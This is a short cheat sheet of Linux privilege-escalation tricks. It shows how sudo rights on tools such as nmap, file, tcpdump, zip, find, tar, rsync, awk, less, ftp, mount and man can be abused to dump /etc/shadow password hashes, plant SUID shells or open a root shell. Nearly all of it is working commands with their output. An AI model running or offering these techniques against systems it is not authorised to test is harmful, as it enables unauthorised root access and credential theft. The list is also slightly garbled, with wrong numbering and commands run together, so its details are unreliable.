You can find out which commands your user is allowed to run as root by running "sudo -l".
Here are some examples:
1. SUDO NMAP
user@host:~$ sudo nmap -iL /etc/shadow 2>&1 | grep root
Failed to resolve "root:$6$tacLae7v$blr1A8KS2WwHTLgttagiFMgGa94JEkKXVNXAm8a5Lg5vJrdowQTiycwML9M2ibBF6Vu4KZAHcOgOLuqrc6kdn0:16135:0:99999:7:::".
(nmap < 5.35DC1 also has a "--interactive" switch which drops you to a shell where you can execute commands using the "!cmd" syntax)
2. SUDO FILE
user@host:~$ sudo file -m /etc/shadow /etc/shadow, 1: Warning: offset `root:$6$5EZeAFXG$V.b3POklvJLNMt0cIEIQecW2Co6cKFUXmDR5bHVjWdsgTJq8URt6m7zBfNFNxdMEZHD7F4esGON.OED88HBPn1:16491:0:99999:7:::' invalid [... snip ...]
3. SUDO TCPDUMP
user@host:~$ echo -e "cp /bin/sh /tmp/sh_suid\nchmod 7555 /tmp/sh_suid" > tmpfile user@host:~$ chmod +x tmpfile user@host:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes Maximum file limit reached: 1 user@host:~$ ls -l /tmp/sh_suid -r-sr-sr-t 1 root root 117176 May 19 10:14 /tmp/sh_suid user@host:~$ /tmp/sh_suid # whoami root
4. SUDO ZIP
user@host:~$ touch somefile user@host:~$ sudo zip -q /tmp/test.zip somefile -T -TT '/bin/sh #' # id uid=0(root) gid=0(root) groups=0(root)
5. SUDO FIND
user@host:~$ sudo find /dev/null -exec sh \; # id uid=0(root) gid=0(root) groups=0(root)
6. SUDO TAR
user@host:~$ touch somefile user@host:~$ sudo tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/sh # id uid=0(root) gid=0(root) groups=0(root)
7. SUDO RSYNC
user@host:/tmp$ cat > somefile << EOF > cp /bin/sh /tmp/sh_root > chmod a+sx /tmp/sh_root > EOF user@host:/tmp$ sudo rsync -e 'sh /tmp/somefile' /dev/null 127.0.0.1:/dev/null 2>/dev/null user@host:/tmp$ /tmp/sh_root # whoami root
8. SUDO AWK
user@host:~$ sudo awk 'BEGIN {system("/usr/bin/id")}'
uid=0(root) gid=0(root) groups=0(root)
9. SUDO MORE/SUDO LESS
user@host:~$ sudo more /dev/zero
[...]
!bash
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
10. SUDO (S)FTP
user@host:~$ sudo ftp ftp> !id uid=0(root) gid=0(root) groups=0(root) ftp>
11. SUDO MOUNT
user@host:~$ sudo mount -o bind /bin/bash /bin/mount user@host:~$ sudo mount root@host:~# id uid=0(root) gid=0(root) groups=0(root)
8. SUDO MAN
user@host:~$ sudo man -P id man uid=0(root) gid=0(root) groups=0(root)